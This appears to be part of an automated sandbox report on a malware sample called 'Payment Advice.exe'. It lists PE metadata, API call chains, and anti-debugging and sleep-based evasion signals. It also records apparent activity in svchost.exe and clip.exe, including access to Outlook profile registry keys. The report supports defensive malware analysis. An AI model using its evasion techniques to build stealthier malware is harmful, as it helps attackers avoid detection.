Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Payment Advice.exe

Static file information: File size 1170944 > 1048576

Source: Payment Advice.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payment Advice.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payment Advice.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Payment Advice.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Payment Advice.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Payment Advice.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Payment Advice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000000.1747131263.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000000.1898332089.00000000002EE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Advice.exe, 00000000.00000003.1638476468.0000000004280000.00000004.00001000.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000003.1638093637.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1824961827.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1824961827.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1732271397.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734028020.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100101355.000000000466E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1827343690.0000000004329000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1824562864.0000000004174000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100101355.00000000044D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Advice.exe, 00000000.00000003.1638476468.0000000004280000.00000004.00001000.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000003.1638093637.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1824961827.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1824961827.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1732271397.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734028020.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.4100101355.000000000466E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1827343690.0000000004329000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1824562864.0000000004174000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100101355.00000000044D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1824835569.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1792564169.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099450427.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4099123846.0000000002885000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100415517.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000000.1898644443.00000000027CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.000000002475C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4099123846.0000000002885000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4100415517.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000000.1898644443.00000000027CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.000000002475C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1824835569.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1792564169.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099450427.00000000011D8000.00000004.00000020.00020000.00000000.sdmp

Source: Payment Advice.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Payment Advice.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Payment Advice.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Payment Advice.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Payment Advice.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_0059E01E LoadLibraryA,GetProcAddress,

0_2_0059E01E

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005AC09E push esi; ret	0_2_005AC0A0
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005AC187 push edi; ret	0_2_005AC189
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005EC8BC push esi; ret	0_2_005EC8BE
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005A6B05 push ecx; ret	0_2_005A6B18
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CB2B1 push FFFFFF8Bh; iretd	0_2_005CB2B3
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005ABDAA push edi; ret	0_2_005ABDAC
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005ABEC3 push esi; ret	0_2_005ABEC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004031C0 push eax; ret	1_2_004031C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004161D3 push ecx; ret	1_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004162CC push ecx; ret	1_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417356 push ebx; retf	1_2_00417359
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416338 push ecx; ret	1_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004083DA push es; ret	1_2_004083DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040BBEC pushad ; iretd	1_2_0040BBEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418577 push 2823B84Bh; retf	1_2_00418587
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417D38 push ecx; iretd	1_2_00417D39
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf	1_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411E39 push esp; ret	1_2_00411E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf	1_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0340225F pushad ; ret	1_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034027FA pushad ; ret	1_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx	1_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0340283D push eax; iretd	1_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0340135E push eax; iretd	1_2_03401369
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E595CB pushad ; iretd	2_2_04E595CD
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E55DB9 push es; ret	2_2_04E55DBD
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E64D35 push ebx; retf	2_2_04E64D38
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E707EB push ecx; iretd	2_2_04E707EC
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E65F56 push 2823B84Bh; retf	2_2_04E65F66
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E65717 push ecx; iretd	2_2_04E65718
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E6B883 push edi; ret	2_2_04E6B884

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_005E8111
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_0059EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0059EB42

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_005A123A

Source: C:\Users\user\Desktop\Payment Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Payment Advice.exe	API/Special instruction interceptor: Address: 1753204
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0347096E rdtsc

1_2_0347096E

Source: C:\Windows\SysWOW64\clip.exe	Window / User API: threadDelayed 595			Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Window / User API: threadDelayed 9376			Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice.exe	API coverage: 5.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\clip.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\clip.exe TID: 6648	Thread sleep count: 595 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 6648	Thread sleep time: -1190000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 6648	Thread sleep count: 9376 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 6648	Thread sleep time: -18752000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe TID: 6212	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe TID: 6212	Thread sleep time: -40500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe TID: 6212	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe TID: 6212	Thread sleep time: -37000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_005C6CA9
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_005C60DD
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_005C63F9
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_005CEB60
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CF56F FindFirstFileW,FindClose,	0_2_005CF56F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_005CF5FA
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_005D1B2F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_005D1C8A
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_005D1F94
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0239BC20 FindFirstFileW,FindNextFileW,FindClose,	3_2_0239BC20

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_0059DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0059DDC0

Source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4099659874.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: clip.exe, 00000003.00000002.4099123846.0000000002885000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: firefox.exe, 00000008.00000002.2115530009.000002AEE464D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpp

Source: C:\Users\user\Desktop\Payment Advice.exe

API call chain: ExitProcess graph end node

graph_0-92841

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0347096E rdtsc

1_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004173E3 LdrLoadDll,

1_2_004173E3

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005D6AAF BlockInput,

0_2_005D6AAF

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_00583D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00583D19

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_005B3920

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_0059E01E LoadLibraryA,GetProcAddress,

0_2_0059E01E

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_01753470 mov eax, dword ptr fs:[00000030h]	0_2_01753470
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_017534D0 mov eax, dword ptr fs:[00000030h]	0_2_017534D0
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_01751E70 mov eax, dword ptr fs:[00000030h]	0_2_01751E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]	1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]	1_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]	1_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]	1_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]	1_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]	1_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]	1_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h]	1_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h]	1_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0350634F mov eax, dword ptr fs:[00000030h]	1_2_0350634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D437C mov eax, dword ptr fs:[00000030h]	1_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]	1_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]	1_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]	1_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h]	1_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h]	1_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]	1_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h]	1_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]	1_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]	1_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]	1_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]	1_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]	1_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]	1_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]	1_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]	1_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]	1_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]	1_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]	1_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]	1_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]	1_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]	1_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]	1_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]	1_2_0345438F
